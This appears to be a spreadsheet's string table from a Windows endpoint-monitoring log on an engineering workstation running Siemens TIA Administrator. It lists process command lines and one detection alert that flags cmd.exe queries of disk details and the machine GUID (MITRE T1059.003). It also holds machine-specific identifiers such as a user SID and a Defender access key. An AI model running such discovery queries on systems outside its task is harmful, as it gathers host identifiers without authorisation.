  <si>
    <t>May 9, 2025 @ 11:28:14.137</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:14.314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</si>
  <si>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--renderer-client-id=33 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=905821225 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=7616 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:16.747</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:19.477</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:19.654</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:19.655</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:OobeHost.AppXdcwkjpb46w3zw4hbmx5jfxajhymjka0d.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:19.663</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXpybpk6fj2fe0gb0jan49e6dncngk3pa1.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:27.266</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:28.936</t>
  </si>
  <si>
    <t>\\\\?\\C:\\Windows\\System32\\SecurityHealth\\10.0.27777.1008-0\\SecurityHealthHost.exe {08728914-3F57-4D52-9E31-49DAECA5A80A} -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:30.190</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:35.294</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:35.317</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:35.427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</si>
  <si>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--renderer-client-id=34 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=926838228 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=4436 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:40.353</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:40.355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</si>
  <si>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--renderer-client-id=35 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=931980519 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=4192 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:42.840</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:43.405</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:43.433</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:43.491</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:56.303</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:56.856</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:56.967</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:56.975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</si>
  <si>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--field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=6952 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:57.490</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-GB --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=4212 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:58.352</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe5_ Global\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:58.569</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:58.800</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:28:58.902</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=on_device_model.mojom.OnDeviceModelService --lang=en-GB --service-sandbox-type=on_device_model_execution --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:02.435</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:02.491</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:02.816</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:02.924</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:06.195</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:13.046</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:13.605</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:14.177</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:15.616</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:15.617</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:18.318</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:19.309</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=5620 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:23.268</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:23.269</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:26.144</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:27.785</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:31.596</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:31.622</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:31.623</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:31.662</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:31.668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</si>
  <si>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--renderer-client-id=40 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=983857143 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=7860 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:32.201</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:33.906</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:34.195</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:34.196</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:48.386</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:49.410</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:50.192</t>
  </si>
  <si>
    <t>\"C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\OneDrive\\25.065.0406.0002\\Microsoft.SharePoint.exe\" /silentConfig</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:53.078</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\MicrosoftEdgeUpdate.exe\" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNTciIHNoZWxsX3ZlcnNpb249IjEuMy4xODUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MUM3NDdDMDgtQTkyRS00MUI3LUE5QjQtNzczQzFDMDVDNUJDfSIgdXNlcmlkPSJ7MjdBMTkwQjUtNkFFQy00OTg4LThBMDQtM0Y5QjY5Njc3RUU0fSIgaW5zdGFsbHNvdXJjZT0iY29yZSIgcmVxdWVzdGlkPSJ7MkM1QjhGRDYtRTYxMS00OTY4LTkxOTMtMkYzRUM2MkZCRDgyfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjQiIHBoeXNtZW1vcnk9IjIiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yNjEwMC4zNzc1IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IlZNd2FyZSwgSW5jLiIgcHJvZHVjdF9uYW1lPSJWTXdhcmUyMCwxIi8-PGV4cCBldGFnPSImcXVvdDtFK3hiQXo2WTZzVTEyODliUzZxbDRWUkxia2pmQlVHVE1Kc2pySHI0NGlJPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjU3IiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iNDUiIGNvaG9ydD0icnJmQDAuMTEiPjx1cGRhdGVjaGVjay8-PHBpbmcgcmQ9IjY3MDMiIHBpbmdfZnJlc2huZXNzPSJ7MUExMjQ1NjItNDA3MC00RDk4LUFGRDgtOTlBNTc4RUVGODNEfSIvPjwvYXBwPjxhcHAgYXBwaWQ9Ins1NkVCMThGOC1CMDA4LTRDQkQtQjZEMi04Qzk3RkU3RTkwNjJ9IiB2ZXJzaW9uPSIxMzUuMC4zMTc5Ljk4IiBuZXh0dmVyc2lvbj0iMTM2LjAuMzI0MC41MCIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSI0NSIgY29ob3J0PSJycmZAMC45MCIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzg3MzI3MTI2Mjc4MTAxMCIgdXBkYXRlX2NvdW50PSI0Ij48dXBkYXRlY2hlY2svPjxldmVudCBldmVudHR5cGU9IjEyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIyOTE5MDU5MTIwIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjI5MTk3MzMzMTgiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNCIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMzA5MzU3MjE3NyIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iZG8iIHVybD0iaHR0cDovL21zZWRnZS5iLnRsdS5kbC5kZWxpdmVyeS5tcC5taWNyb3NvZnQuY29tL2ZpbGVzdHJlYW1pbmdzZXJ2aWNlL2ZpbGVzLzQzYTg0MzFmLTk4NTItNDFhYy04OTllLTFkMTk1NjA2M2U2Nz9QMT0xNzQ3MzkwNjc5JmFtcDtQMj00MDQmYW1wO1AzPTImYW1wO1A0PVF1U1hsWDlybjZGeTczQm5zNFIxWThDelJOZDFudDJMaHo1d2tJTWlFUlB6Rlg3cFl2cEY0Z3Vwelg1cUViSGtuJTJiTVlmTENMQTFqMjdkdFRWQXk1dkElM2QlM2QiIHNlcnZlcl9pcF9oaW50PSIiIGNkbl9jaWQ9Ii0xIiBjZG5fY2NjPSIiIGNkbl9tc2VkZ2VfcmVmPSIiIGNkbl9henVyZV9yZWZfb3JpZ2luX3NoaWVsZD0iIiBjZG5fY2FjaGU9IiIgY2RuX3AzcD0iIiBkb3dubG9hZGVkPSI2Mzc4NjA2NCIgdG90YWw9IjYzNzg2MDY0IiBkb3dubG9hZF90aW1lX21zPSI3OTg1Ii8-PGV2ZW50IGV2ZW50dHlwZT0iMTQiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjMwOTM5NjQwODkiIHNvdXJjZV91cmxfaW5kZXg9IjAiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxNSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iMzExMTkzMzM5MyIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjMiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5Njc1NyIgc3lzdGVtX3VwdGltZV90aWNrcz0iNjQzODU0NDA4NCIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9IjYwNTAiIGRvd25sb2FkX3RpbWVfbXM9IjE3MzQ3IiBkb3dubG9hZGVkPSI2Mzc4NjA2NCIgdG90YWw9IjYzNzg2MDY0IiBwYWNrYWdlX2NhY2hlX3Jlc3VsdD0iMCIgaW5zdGFsbF90aW1lX21zPSIzMzIzMDYiLz48cGluZyByZD0iNjcwMyIgcGluZ19mcmVzaG5lc3M9Ins5NEQ0QkEyOC0yMkVCLTRGRDktQTMzNy0wNDg4NDYzMDJGNjd9Ii8-PC9hcHA-PGFwcCBhcHBpZD0ie0YzMDE3MjI2LUZFMkEtNDI5NS04QkRGLTAwQzNBOUE3RTRDNX0iIHZlcnNpb249IjEzNS4wLjMxNzkuOTgiIG5leHR2ZXJzaW9uPSIxMzYuMC4zMjQwLjUwIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9IjQ1IiBjb2hvcnQ9InJyZkAwLjI5IiB1cGRhdGVfY291bnQ9IjQiPjx1cGRhdGVjaGVjay8-PGV2ZW50IGV2ZW50dHlwZT0iMTIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjI5MTk0NzE1NjMiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIxMyIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgc3lzdGVtX3VwdGltZV90aWNrcz0iNjQ0MzY0NDY5MCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI2NTAyODUyMjcyIiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMTUiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiIHN5c3RlbV91cHRpbWVfdGlja3M9IjY1MjQ1MTA5ODkiIGRvbmVfYmVmb3JlX29vYmVfY29tcGxldGU9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSIzIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIxOTY3NTciIHN5c3RlbV91cHRpbWVfdGlja3M9IjEwMDE0MDQ4NTI5IiBkb25lX2JlZm9yZV9vb2JlX2NvbXBsZXRlPSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iNjA3MSIgZG93bmxvYWRlZD0iNjM3ODYwNjQiIHRvdGFsPSI2Mzc4NjA2NCIgcGFja2FnZV9jYWNoZV9yZXN1bHQ9IjIiIGluc3RhbGxfdGltZV9tcz0iMzQ3OTM3Ii8-PHBpbmcgcmQ9IjY3MDMiIHBpbmdfZnJlc2huZXNzPSJ7RDI2QjFGQzktRDc4Qy00ODU1LUE4NTMtNTQ3MUEwMDI0OTBEfSIvPjwvYXBwPjwvcmVxdWVzdD4</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:55.496</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:29:58.786</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:05.452</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:37.973</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=4140 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:40.907</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:42.137</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:47.095</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:47.176</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:49.896</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:53.046</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:54.095</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:54.101</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:54.233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</si>
  <si>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--renderer-client-id=42 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=1065845602 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=6228 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:54.683</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:54.890</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:55.585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</si>
  <si>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--field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=7408 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:30:57.006</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:DFABG4rRc0W1LPz1.0.2 -wce:0000000000000210  -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:07.761</t>
  </si>
  <si>
    <t>\"C:\\Users\\Engineer\\AppData\\Local\\Microsoft\\OneDrive\\25.065.0406.0002\\OneDriveLauncher.exe\" /startInstances</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:16.459</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:18.722</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:18.918</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:19.710</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:20.317</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:20.480</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:20.488</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:38.255</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:45.339</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:45.415</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:45.454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</si>
  <si>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--renderer-client-id=44 --time-ticks-at-unix-epoch=-1746785587125926 --launch-time-ticks=1116858165 --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=8276 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:47.595</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:55.800</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:58.966</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe_S-1-5-21-1228744127-581660863-1459446450-10016_ Global\\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-1228744127-581660863-1459446450-10016 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\"  \"1\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:59.734</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:31:59.777</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:02.111</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:02.129</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:10.224</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:10.252</t>
  </si>
  <si>
    <t>\"C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25030.2-0\\MpCmdRun.exe\" GetDeviceTicket -AccessKey A1B4B091-6A4C-DF02-8C14-1099A6BA8839</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:11.354</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:11.922</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:13.811</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:27.391</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:34.663</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:39.185</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:39.232</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:44.336</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:45.628</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:46.846</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:59.483</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:32:59.613</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:03.028</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\sc.exe qc almservice</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:03.040</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:03.041</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:10.844</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\cmd.exe /d /s /c \"wmic logicaldisk get Caption,FreeSpace,Size,VolumeSerialNumber,Description  /format:list\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:10.845</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\cmd.exe /d /s /c \"%windir%\\System32\\REG QUERY HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:10.890</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:10.891</t>
  </si>
  <si>
    <t>Windows command prompt started by an abnormal process</t>
  </si>
  <si>
    <t>[T1059.003]</t>
  </si>
  <si>
    <t>[Execution]</t>
  </si>
  <si>
    <t>[Windows Command Shell]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:10.892</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\REG  QUERY HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:11.257</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\cmd.exe /d /s /c \"%%windir%%\\System32\\REG QUERY HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography /v MachineGuid\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:13.401</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\Siemens\\Automation\\TIAADMIN\\server\\modules\\soft\\native\\BITSJobsInventory.exe\" \"\" \"\" \"\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:14.620</t>
  </si>
  <si>
    <t>TIA Administrator terminated unexpectedly</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:16.276</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:22.551</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:33:23.757</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:02.519</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:02.523</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:02.526</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:02.528</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:02.529</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:02.530</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:02.551</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:02.578</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:02.586</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:02.591</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:04.357</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:04.358</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:11.585</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:17.343</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:18.349</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:18.360</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:19.844</t>
  </si>
  <si>
    <t>taskhostw.exe -RegisterDevice -ProtectionStateChanged -FreeNetworkOnly</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:20.287</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:20.958</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=6560 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:22.302</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:22.592</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:26.769</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:28.906</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:39.856</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:34:44.080</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:00.478</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:DFABG4rRc0W1LPz1.0.3 -wce:0000000000000210  -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:08.476</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:16.725</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:19.304</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:19.351</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:20.978</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:21.056</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:21.059</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:23.257</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:25.413</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\usoclient.exe\" StartStoreUpdates</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:25.541</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:26.637</t>
  </si>
  <si>
